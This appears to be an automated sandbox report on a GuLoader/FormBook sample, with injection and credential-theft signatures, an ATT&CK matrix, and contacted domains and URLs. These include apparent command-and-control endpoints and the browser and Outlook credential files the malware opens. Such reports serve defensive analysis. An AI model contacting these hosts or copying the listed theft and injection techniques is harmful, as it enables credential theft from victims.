        Source: C:\Windows\SysWOW64\msdt.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6996F0000 value starts with: 4D5AJump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeThread register set: target process: 7696Jump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 7696Jump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 5308Jump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeProcess created: C:\Users\user\Desktop\fjerbregners_patrol.exe C:\Users\user\Desktop\fjerbregners_patrol.exeJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exeJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: RAVCpl64.exe, 00000003.00000000.3665741071.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.5563308243.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.4258369988.0000000000D80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: RAVCpl64.exe, 00000003.00000000.3665741071.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.5563308243.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.4258369988.0000000000D80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: NProgram Manager
        Source: RAVCpl64.exe, 00000003.00000000.3665741071.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.5563308243.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.4258369988.0000000000D80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000005.00000002.5560003988.0000000000607000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4256977558.0000000000607000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
        Source: RAVCpl64.exe, 00000003.00000000.3665741071.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.5563308243.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.4258369988.0000000000D80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_0040360D EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,0_2_0040360D

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.3794736895.00000000339B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.5562833277.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.5562454936.0000000004980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.5559916396.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\msdt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.3794736895.00000000339B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.5562833277.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.5562454936.0000000004980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.5559916396.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Masquerading        		1
        OS Credential Dumping        		221
        Security Software Discovery        		Remote Services1
        Email Collection        		Exfiltration Over Other Network Medium11
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        System Shutdown/Reboot
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts612
        Process Injection        		11
        Virtualization/Sandbox Evasion        		LSASS Memory11
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		Exfiltration Over Bluetooth4
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)1
        DLL Side-Loading        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		Automated Exfiltration5
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		Scheduled Transfer6
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets3
        File and Directory Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common2
        Obfuscated Files or Information        		Cached Domain Credentials5
        System Information Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1289248 Sample: fjerbregners_patrol.exe Startdate: 10/08/2023 Architecture: WINDOWS Score: 100 31 www.zenturasolutions.com 2->31 33 www.wolfcapital.top 2->33 35 12 other IPs or domains 2->35 47 Snort IDS alert for network traffic 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 3 other signatures 2->53 10 fjerbregners_patrol.exe 1 34 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 65 Tries to detect Any.run 10->65 14 fjerbregners_patrol.exe 6 10->14         started        signatures6 process7 dnsIp8 43 googlehosted.l.googleusercontent.com 142.250.185.129, 443, 49716 GOOGLEUS United States 14->43 45 drive.google.com 142.250.185.206, 443, 49715 GOOGLEUS United States 14->45 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Tries to detect Any.run 14->69 71 Maps a DLL or memory area into another process 14->71 73 Queues an APC in another process (thread injection) 14->73 18 RAVCpl64.exe 14->18 injected signatures9 process10 process11 20 msdt.exe 13 18->20         started        signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Writes to foreign memory regions 20->59 61 3 other signatures 20->61 23 explorer.exe 2 1 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.openlend.lat 169.150.247.39, 49734, 49735, 49736 SPIRITTEL-ASUS United States 23->37 39 www.legalinmedia.online 91.189.114.27, 49738, 49739, 49740 RU-CENTERRU Russian Federation 23->39 41 7 other IPs or domains 23->41 63 System process connects to network (likely due to code injection or exploit) 23->63 signatures15

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        fjerbregners_patrol.exe32%VirustotalBrowse
        fjerbregners_patrol.exe58%ReversingLabsWin32.Trojan.Guloader

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        wolfcapital.top1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.sonokmall.info/aw8o/0%Avira URL Cloudsafe
        http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
        http://www.fgnvcmef.click0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://www.fgnvcmef.click/aw8o/0%Avira URL Cloudsafe
        http://www.handsome-sex.com/aw8o/?1NM6e=9zOZF6sYY9k/tdVrbXWkN8sA2agMahsOyqxI7TXZC8QU+v+BgRTEySnaHWgeO9Bnd0OQd62k8t+QBgqfLMlzOLISTcCK1ibTiw==&P4=_n5TPHiTKZj0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        https://canary.sdx.microsoftcom/a0%Avira URL Cloudsafe
        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
        https://sdx.microsoft-ppe.com/0%Avira URL Cloudsafe
        http://i3.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
        http://www.kepaoqin.top/aw8o/?P4=_n5TPHiTKZj&1NM6e=UdSYgafQlh0t2NPJFWsJTuyq7bpxDbJ0k4ok7GV9MtKriqrdB2GNDlXOyj3801N/gTxArORLFOT1XOkGkvvmtP3cZGRd+UEGYg==0%Avira URL Cloudsafe
        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
        http://www.sonokmall.info/aw8o/?P4=_n5TPHiTKZj&1NM6e=4wyyFbo3wf4GPkojX9lv2Hi85TpF3a9bJFCVb7ujVjad/QnKgAM8Rmx0lfLSMwhbZvHAQ1fpLn066tx6/q5vMcOgf2mjw6QkIA==0%Avira URL Cloudsafe
        http://www.ladakhzesmo.com/aw8o/?1NM6e=JHyqG6c0VkX+12EdRRnMiv591CJu3XVJOhv6jqyuy3yB/QILPRQMYUaLAuC7PLR0Wsfx0havIXAbx1R+v/HWlYVUV6jOtwoJGQ==&P4=_n5TPHiTKZj0%Avira URL Cloudsafe
        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
        http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
        http://www.legalinmedia.online/aw8o/?P4=_n5TPHiTKZj&1NM6e=csQIKxSiAps2oY2HkWP4m2UAXHoJbYdtF0OMXDtSslnXYUx4jfx20xSs5MiYBfJn4Wt0LZQ+kGwlvq1TpxG6ruHpMlvoexuWNA==0%Avira URL Cloudsafe
        https://deff.nelr0%Avira URL Cloudsafe
        http://www.zenturasolutions.com/aw8o/?1NM6e=taxf5j588OeYZZ7u8xH1eBnKDxsrb249ZHPrEnAhG3HGAn0ZxHMys4uYbZGY9eDFVkb7zYlxcXM3bVIeT/ayzX9aM5XiamXyxQ==&P4=_n5TPHiTKZj0%Avira URL Cloudsafe
        http://www.quovadis.bm00%Avira URL Cloudsafe
        http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
        http://i3.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
        http://www.zenturasolutions.com/aw8o/0%Avira URL Cloudsafe
        http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
        http://www.legalinmedia.online/aw8o/0%Avira URL Cloudsafe
        http://schemas.micro0%Avira URL Cloudsafe
        http://www.openlend.lat/aw8o/0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.ladakhzesmo.com
        		119.18.54.51
        		truetrue
          		unknown
          www.fgnvcmef.click
          		43.154.67.170
          		truetrue
            		unknown
            wolfcapital.top
            		51.79.96.115
            		truetrueunknown
            www.zenturasolutions.com
            		104.21.62.30
            		truetrue
              		unknown
              www.openlend.lat
              		169.150.247.39
              		truetrue
                		unknown
                handsome-sex.com
                		96.44.182.131
                		truetrue
                  		unknown
                  www.legalinmedia.online
                  		91.189.114.27
                  		truetrue
                    		unknown
                    drive.google.com
                    		142.250.185.206
                    		truefalse
                      		high
                      googlehosted.l.googleusercontent.com
                      		142.250.185.129
                      		truefalse
                        		high
                        www.kepaoqin.top
                        		107.148.17.67
                        		truetrue
                          		unknown
                          www.sonokmall.info
                          		162.0.239.145
                          		truetrue
                            		unknown
                            doc-0g-2c-docs.googleusercontent.com
                            		unknown
                            		unknownfalse
                              		high
                              www.handsome-sex.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.wolfcapital.top
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.fgnvcmef.click/aw8o/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://doc-0g-2c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8tk9bkcje0otiv862ca41hvnkh9akt9l/1691655375000/10072219387490488252/*/1ac1-oEkoP2YeI5Q4arlxAmDDETDNVAGt?e=download&uuid=6226759b-1077-47f6-8c73-64f4b8b57f79false
                                    		high
                                    http://www.handsome-sex.com/aw8o/?1NM6e=9zOZF6sYY9k/tdVrbXWkN8sA2agMahsOyqxI7TXZC8QU+v+BgRTEySnaHWgeO9Bnd0OQd62k8t+QBgqfLMlzOLISTcCK1ibTiw==&P4=_n5TPHiTKZjtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sonokmall.info/aw8o/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sonokmall.info/aw8o/?P4=_n5TPHiTKZj&1NM6e=4wyyFbo3wf4GPkojX9lv2Hi85TpF3a9bJFCVb7ujVjad/QnKgAM8Rmx0lfLSMwhbZvHAQ1fpLn066tx6/q5vMcOgf2mjw6QkIA==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.kepaoqin.top/aw8o/?P4=_n5TPHiTKZj&1NM6e=UdSYgafQlh0t2NPJFWsJTuyq7bpxDbJ0k4ok7GV9MtKriqrdB2GNDlXOyj3801N/gTxArORLFOT1XOkGkvvmtP3cZGRd+UEGYg==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.ladakhzesmo.com/aw8o/?1NM6e=JHyqG6c0VkX+12EdRRnMiv591CJu3XVJOhv6jqyuy3yB/QILPRQMYUaLAuC7PLR0Wsfx0havIXAbx1R+v/HWlYVUV6jOtwoJGQ==&P4=_n5TPHiTKZjtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.legalinmedia.online/aw8o/?P4=_n5TPHiTKZj&1NM6e=csQIKxSiAps2oY2HkWP4m2UAXHoJbYdtF0OMXDtSslnXYUx4jfx20xSs5MiYBfJn4Wt0LZQ+kGwlvq1TpxG6ruHpMlvoexuWNA==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.zenturasolutions.com/aw8o/?1NM6e=taxf5j588OeYZZ7u8xH1eBnKDxsrb249ZHPrEnAhG3HGAn0ZxHMys4uYbZGY9eDFVkb7zYlxcXM3bVIeT/ayzX9aM5XiamXyxQ==&P4=_n5TPHiTKZjtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.openlend.lat/aw8o/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.zenturasolutions.com/aw8o/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.legalinmedia.online/aw8o/true
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabmsdt.exe, 00000004.00000002.5572719203.0000000007B71000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5574554854.00000000080DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.msn.com/de-de/sport/motorsport/motogp/renn-kalenderexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Condition/AAehyQC.svgexplorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchmsdt.exe, 00000004.00000002.5572719203.0000000007B71000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5574554854.00000000080DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.msn.com/de-de/finanzen/top-stories/zahlreiche-deutsche-autos-auf-havarierter-fremantle-hexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=msdt.exe, 00000004.00000002.5574554854.00000000080DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.nic.ru/catalog/ssl/RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4273113348.000000000C9A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5584620041.000000000C9A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.msn.com/de-de/sport/fussball/soccer-international-world-cup-womenexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.fjerbregners_patrol.exe, 00000002.00000001.3579838555.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.msn.com/de-de/lifestyle/leben/keine-guten-ausssichen-4-sternzeichen-erwartet-ein-schwereexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://excel.office.comexplorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDfjerbregners_patrol.exe, 00000002.00000001.3579838555.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                                            		high
                                                            http://www.gopher.ftp://ftp.fjerbregners_patrol.exe, 00000002.00000001.3579838555.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://api.msn.com/hbexplorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://sdx.microsoft-int.com/explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.msn.com/de-de/nachrichten/politik/stimmung-auf-dem-tiefpunkt-in-einem-600-seelen-dorf-enexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.google.comfjerbregners_patrol.exe, 00000002.00000003.3635785423.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.msn.com/de-de/nachrichten/panorama/neonazis-wollten-badegexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.nic.ru/catalog/domains/RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/de-de/nachrichten/panorama/rettungshubschrauber-kollidiert-mit-baum-in-dresden/aexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msdt.exe, 00000004.00000002.5572719203.0000000007B71000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5574554854.00000000080DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.msn.com/de-de/nachrichten/panorama/kaufland-partnersuche-sorgt-fexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfRAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://wstatic.hosting.nic.ru/logo.svgexplorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://canary.sdx.microsoftcom/aexplorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://js.users.51.la/21279699.jsRAVCpl64.exe, 00000003.00000002.5568062940.0000000003F76000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005686000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013396000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.4570818211.00000000167E6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://wns.windows.com/explorer.exe, 00000005.00000000.4273113348.000000000CECF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4938853327.000000000CECF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5590270246.000000000CECF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4946620557.000000000CECF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://sdx.microsoft-ppe.com/explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.fgnvcmef.clickexplorer.exe, 00000005.00000002.5580841811.000000000A6A8000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
